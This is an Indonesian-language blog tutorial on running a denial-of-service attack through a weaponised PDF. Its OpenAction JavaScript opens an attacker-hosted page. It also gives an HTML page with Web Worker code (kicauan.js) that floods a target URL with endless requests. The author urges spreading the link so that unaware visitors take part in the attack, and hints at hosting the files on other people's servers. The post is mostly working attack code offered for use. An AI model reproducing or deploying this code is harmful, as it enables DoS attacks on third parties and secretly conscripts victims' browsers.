-----[ Pendahuluan
Ini adalah tulisan pertama penulis di HN, Selamat Menikmati :)
kritik dan saran membangun bisa di kirim via pm, okey
-----[ Apa Sih Dos (Denial of Service) ?
[Bahasa Indonesia]
http://id.wikipedia.org/wiki/Serangan_DoS
[Bahasa Inggris]
http://en.wikipedia.org/wiki/Denial-of-service_attack
-----[ Mengapa memilih PDF ??
[Itu Karena]
http://blog.nitropdf.com/index.php/2009/07/14/why-pdf/
Jadi menurut tulisan tersebut, Alasan banyak orang memilih PDF
PDF Format banyak digunakan oleh orang karena :
1. Portabilitas. Ukurannya kecil / ringan .
2. Merupakan Dokumen yang bersifat Cross-platform. Hampir setiap orang di semua sistem komputer dapat membacanya.
3. Akurasi / ketepatan . jika dilihat pada komputer manapun, tampilannya tidak berubah, begitu juga saat di print.
4. Keterbukaan . Siapa pun dapat mengembangkan software untuk membuat dan mengedit dokumen berformat PDF.
5. Familiar. File PDF dalam banyak hal memiliki sifat sama seperti kertas (tentunya kertas versi elektronik),
yang menarik dan mudah dipahami bagi banyak orang.
-----[ Peralatannya ??]-----------------
[1. ] Buat File PDF nya via Notepad.
Trus Save as Prendjak_d0z.pdf
---------------------------------
"---------[B-WARE.pdf]---------"
CODE
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 7 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (Salam B-WARE) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
7 0 obj
<<
/Type /Action
/S /JavaScript
/JS (try {
app.launchURL('http://ns71337.hostzi.com/kill', true);
} catch(e) {
app.alert('Urlnya Salah');
}
try {
app.launchURL('ymsgr:sendIM?fak.hrie&m=Its Work!', true);
} catch(e) {
app.alert('Komputer kk lom ada YM nya yach?');
}
)
>>
endobj
xref
0 8
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000439 00000 n
0000000553 00000 n
0000000677 00000 n
trailer
<<
/Size 8
/Root 1 0 R
>>
startxref
967
%%EOFinfo: http://ns71337.hostzi.com/kill diganti sesuai dengan tempat dimana kita akan menghost file html dan javascript yang baru saja akan kita buat pada langkah ke dua.
Hayoo, semangat kk!!
[2. ] Buatlah File Html yang isinya seperti di bawah ini, kemudian disimpan dengan nama
prendjak_dos.html
-----------------------------------
"---------[B-WARE.html]---------"
CODE<script type="text/javascript">
function make_url(base){
var date = new Date();
if(base.indexOf("?")==-1){
return base+"?v="+date.getTime();
} else {
return base+"&v="+date.getTime();
}
}
function berkicau()
{
var i = document.getElementsByTagName("img")[0];
i.src = make_url("http://google.com/");
window.status="berkicau";
}
var workers = new Array();
var i=0;
var noWorker = typeof Worker == "undefined" ? true : false;
if(!noWorker) {
try {
for(i=0;i<=3;i++){
workers[i]=new Worker("kicauan.js");
workers[i].postMessage("http://google.com/");
}
} catch(e) {
e = e + "";
alert(e);
if(e.indexOf("Worker is not enabled alias belum di set enable") != -1) {
noWorker = true;
}
}
}
</script>
</head>
<body>
<img style="display:block;position:absolute;"
src="http://google.com/" onload="berkicau()" onerror="berkicau()"
width="0" height="0">
<iframe id="page" name="page" src="http://google.com/"
frameborder="0" noresize="noresize"
style="overflow:visible"></iframe>
</body>
</html>Langkah Berikutnya adalah membuat file workernya, yaitu sebuah file javascript yang bernama kicauan.js
berikut ini adalah isi dari kicauan.js
----------------------------
"---------[kicauan.js]---------"
CODEfunction make_url(base){
var date = new Date();
if(base.indexOf("?")==-1){
return base+"?v="+date.getTime();
} else {
return base+"&v="+date.getTime();
}
}
function kirimpaket(base) {
var fullUrl = make_url(base);
function infoReceived()
{
httpRequest = null;
setTimeout('kirimpaket(\''+base+'\');',1);
}
var httpRequest = new XMLHttpRequest();
httpRequest.open("GET", fullUrl, true);
httpRequest.onreadystatechange = infoReceived;
httpRequest.send(null);
}
self.onmessage = function(e) {
kirimpaket(e.data);
}3. ] Langkah ketiga adalah tentunya mengupload file html dan javascript yang sudah dibuat pada langkah kedua.
Dan Ataupun sekaligus menghost File PDF yang sudah dibuat pada langkah ke satu pada tempat host yang sama.
<----dooH O_o rumit ya????----> uploadlah semua file yang dibuat ke tempat hosting favorit,
mis:Hostingan Html yang gratisan, ataupun yang berbayar, ataupun 'menitipkannya' di server2 terdekat... :D
[4. ] Setelah ketiga file berhasil dibuat dan diupload, Tinggal sebarkan link sehingga banyak orang yang mengklik halaman tersebut tanpa tahu bahwa
dirinya sedang ikut berpartisisapi dalam melakukan keisengan/serangan Dos ini
->jadi gunakan kreatifitas dan jangan lupa berdoa semoga lancar ...
[5. ] Gambaran AKhir
####################################################################
File PDF terklik -> pdf membuka url -> url melakukan serangan secara silent melakukan request yang berulang2 -> target down
####################################################################
REFENSI : PRENDJAK HNC
0 comments:
Post a Comment